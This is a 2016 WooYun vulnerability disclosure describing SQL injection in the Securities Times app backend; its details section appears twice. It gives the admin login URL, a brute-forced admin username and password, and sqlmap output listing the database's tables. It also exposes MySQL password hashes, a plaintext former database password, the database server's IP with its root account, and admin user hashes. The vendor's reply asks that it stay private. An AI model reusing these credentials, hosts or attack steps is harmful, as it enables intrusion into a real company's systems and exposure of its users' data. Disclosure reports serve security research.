当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0215855

漏洞标题:证券时报APPSQ注入影响所有注册用户

相关厂商:stcn.com

漏洞作者: 艺术家

提交时间:2016-06-03 16:23

修复时间:2016-07-18 16:50

公开时间:2016-07-18 16:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-06-03: 细节已通知厂商并且等待厂商处理中
2016-06-03: 厂商已经确认,细节仅向厂商公开
2016-06-13: 细节向核心白帽子及相关领域专家公开
2016-06-23: 细节向普通白帽子公开
2016-07-03: 细节向实习白帽子公开
2016-07-18: 细节向公众公开

简要描述:

RT

详细说明:

WooYun: 证券时报某漏洞(涉及APP/数据库/证券/股票走势等)
根据这个漏洞说的。可以得到APP管理后台,其实也不用,大可以在APP中找到。
http://appzd.zxzx.stcn.com/admin/admin/adminLogin.do
这里
爆破一下用户名,验证码有问题。直接爆破成功。

lidongping  123456


登录进去。

1.png


找到SQL:

back-end DBMS: MySQL 5.0
Database: zhengquanshibaoapp
[79 tables]
+-----------------------------------------+
| bt_config |
| bt_rights |
| t_admin |
| t_banner |
| t_blocks |
| t_category |
| t_category_common |
| t_combination |
| t_combination_common |
| t_combination_favorite |
| t_combination_read |
| t_common |
| t_common_prev |
| t_favorable |
| t_favorable_category |
| t_folder |
| t_folder_rights |
| t_identity |
| t_identity_role |
| t_message |
| t_message_user |
| t_new_case |
| t_newcase_read |
| t_order |
| t_orderItem |
| t_region |
| t_role |
| t_role_rights |
| t_socket_news |
| t_symbol |
| t_tencentpost |
| t_token |
| t_user |
| t_user_category |
| t_user_device |
| t_user_track_Spider |
| t_user_track_lyc |
| t_v_combinationfavorite |
| test_c3p0 |
| v_t_admin |
| v_t_app_user_order_category |
| v_t_article_category |
| v_t_blocks_admin |
| v_t_blocks_category |
| v_t_category_common_block |
| v_t_category_common_combination_commmon |
| v_t_category_favorable |
| v_t_combination_category |
| v_t_combination_category_all |
| v_t_combination_category_all_app |
| v_t_combination_category_user |
| v_t_combination_common |
| v_t_combination_common_category |
| v_t_combination_common_top |
| v_t_combination_preview |
| v_t_combination_read |
| v_t_combination_read_app |
| v_t_combination_user_read |
| v_t_common_admin |
| v_t_common_category_admin |
| v_t_common_prev_admin |
| v_t_config_admin |
| v_t_folder_rights |
| v_t_folder_rights_role |
| v_t_message_admin |
| v_t_message_no_user |
| v_t_message_user |
| v_t_message_user_admin |
| v_t_message_user_admin_sta |
| v_t_order_orderItem |
| v_t_order_orderitem |
| v_t_role_identity |
| v_t_role_rights_menu |
| v_t_statistics |
| v_t_symbol_admin |
| v_t_user_device_info |
| v_t_user_order_category |
| v_t_user_order_orderItem |
| v_t_user_region |
+-----------------------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind


跑出
database management system users password hashes:
[*] readonly [1]:
password hash: NULL
[*] root [5]:
password hash: *39581AB63696F01812388F6F9A9D2E47CB29ABB2
password hash: *A600763916E936C01BCBE0E4136574F3C4E3E5CD
password hash: *B0D78FF9CCB69C7D308259E76EA231B5E6DAA4D2 *****
password hash: *FD5953C1B8CF02528A1577028DFF6244116087DE fo9iU1
password hash: NULL
[*] user1 [1]:
password hash: NULL
[*] zqsb_app [1]:
password hash: *B0D78FF9CCB69C7D308259E76EA231B5E6DAA4D2
[*] zqsbapp [3]:
password hash: *39581AB63696F01812388F6F9A9D2E47CB29ABB2
password hash: *B0D78FF9CCB69C7D308259E76EA231B5E6DAA4D2
password hash: *F352D2FDFB850B4CC196D08DD822ADD5CFD2BB42
之前数据库密码
Quattro!
[*] ''@'localhost'
[*] ''@'localhost.localdomain'
[*] 'readonly'@'121.15.5.177'
[*] 'root'@'115.29.185.90' *
[*] 'root'@'121.15.5.177'
[*] 'root'@'127.0.0.1'
[*] 'root'@'172.18.10.73'
[*] 'root'@'localhost'
[*] 'root'@'localhost.localdomain'
[*] 'user1'@'121.15.139.172'
[*] 'user1'@'121.15.5.177'
[*] 'zqsb_app'@'121.15.5.177'
[*] 'zqsbapp'@'127.0.0.1'
[*] 'zqsbapp'@'192.168.10.29'
[*] 'zqsbapp'@'192.168.10.53'
数据库密码。得到数据库的地址为
115.29.185.90
账号为root
密码为B0D78FF9CCB69C7D308259E76EA231B5E6DAA4D2
账号:
liuyufeng e24d3a6718be9dd73a94a3277c8ee6fa
hemin 143e4ff1b57893f8a62fb729cfa187f6
进入后台:

3.png


4.png


6.png


影响APP所有用户。

漏洞证明:

WooYun: 证券时报某漏洞(涉及APP/数据库/证券/股票走势等)
根据这个漏洞说的。可以得到APP管理后台,其实也不用,大可以在APP中找到。
http://appzd.zxzx.stcn.com/admin/admin/adminLogin.do
这里
爆破一下用户名,验证码有问题。直接爆破成功。

lidongping  123456


登录进去。

1.png


找到SQL:

back-end DBMS: MySQL 5.0
Database: zhengquanshibaoapp
[79 tables]
+-----------------------------------------+
| bt_config |
| bt_rights |
| t_admin |
| t_banner |
| t_blocks |
| t_category |
| t_category_common |
| t_combination |
| t_combination_common |
| t_combination_favorite |
| t_combination_read |
| t_common |
| t_common_prev |
| t_favorable |
| t_favorable_category |
| t_folder |
| t_folder_rights |
| t_identity |
| t_identity_role |
| t_message |
| t_message_user |
| t_new_case |
| t_newcase_read |
| t_order |
| t_orderItem |
| t_region |
| t_role |
| t_role_rights |
| t_socket_news |
| t_symbol |
| t_tencentpost |
| t_token |
| t_user |
| t_user_category |
| t_user_device |
| t_user_track_Spider |
| t_user_track_lyc |
| t_v_combinationfavorite |
| test_c3p0 |
| v_t_admin |
| v_t_app_user_order_category |
| v_t_article_category |
| v_t_blocks_admin |
| v_t_blocks_category |
| v_t_category_common_block |
| v_t_category_common_combination_commmon |
| v_t_category_favorable |
| v_t_combination_category |
| v_t_combination_category_all |
| v_t_combination_category_all_app |
| v_t_combination_category_user |
| v_t_combination_common |
| v_t_combination_common_category |
| v_t_combination_common_top |
| v_t_combination_preview |
| v_t_combination_read |
| v_t_combination_read_app |
| v_t_combination_user_read |
| v_t_common_admin |
| v_t_common_category_admin |
| v_t_common_prev_admin |
| v_t_config_admin |
| v_t_folder_rights |
| v_t_folder_rights_role |
| v_t_message_admin |
| v_t_message_no_user |
| v_t_message_user |
| v_t_message_user_admin |
| v_t_message_user_admin_sta |
| v_t_order_orderItem |
| v_t_order_orderitem |
| v_t_role_identity |
| v_t_role_rights_menu |
| v_t_statistics |
| v_t_symbol_admin |
| v_t_user_device_info |
| v_t_user_order_category |
| v_t_user_order_orderItem |
| v_t_user_region |
+-----------------------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind


跑出
database management system users password hashes:
[*] readonly [1]:
password hash: NULL
[*] root [5]:
password hash: *39581AB63696F01812388F6F9A9D2E47CB29ABB2
password hash: *A600763916E936C01BCBE0E4136574F3C4E3E5CD
password hash: *B0D78FF9CCB69C7D308259E76EA231B5E6DAA4D2 *****
password hash: *FD5953C1B8CF02528A1577028DFF6244116087DE fo9iU1
password hash: NULL
[*] user1 [1]:
password hash: NULL
[*] zqsb_app [1]:
password hash: *B0D78FF9CCB69C7D308259E76EA231B5E6DAA4D2
[*] zqsbapp [3]:
password hash: *39581AB63696F01812388F6F9A9D2E47CB29ABB2
password hash: *B0D78FF9CCB69C7D308259E76EA231B5E6DAA4D2
password hash: *F352D2FDFB850B4CC196D08DD822ADD5CFD2BB42
之前数据库密码
Quattro!
[*] ''@'localhost'
[*] ''@'localhost.localdomain'
[*] 'readonly'@'121.15.5.177'
[*] 'root'@'115.29.185.90' *
[*] 'root'@'121.15.5.177'
[*] 'root'@'127.0.0.1'
[*] 'root'@'172.18.10.73'
[*] 'root'@'localhost'
[*] 'root'@'localhost.localdomain'
[*] 'user1'@'121.15.139.172'
[*] 'user1'@'121.15.5.177'
[*] 'zqsb_app'@'121.15.5.177'
[*] 'zqsbapp'@'127.0.0.1'
[*] 'zqsbapp'@'192.168.10.29'
[*] 'zqsbapp'@'192.168.10.53'
数据库密码。得到数据库的地址为
115.29.185.90
账号为root
密码为B0D78FF9CCB69C7D308259E76EA231B5E6DAA4D2
账号:
liuyufeng e24d3a6718be9dd73a94a3277c8ee6fa
hemin 143e4ff1b57893f8a62fb729cfa187f6
进入后台:

3.png


4.png


6.png


影响APP所有用户。

修复方案:

版权声明:转载请注明来源 艺术家@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-06-03 16:45

厂商回复:

请不要公开,我们正在修复

最新状态:

暂无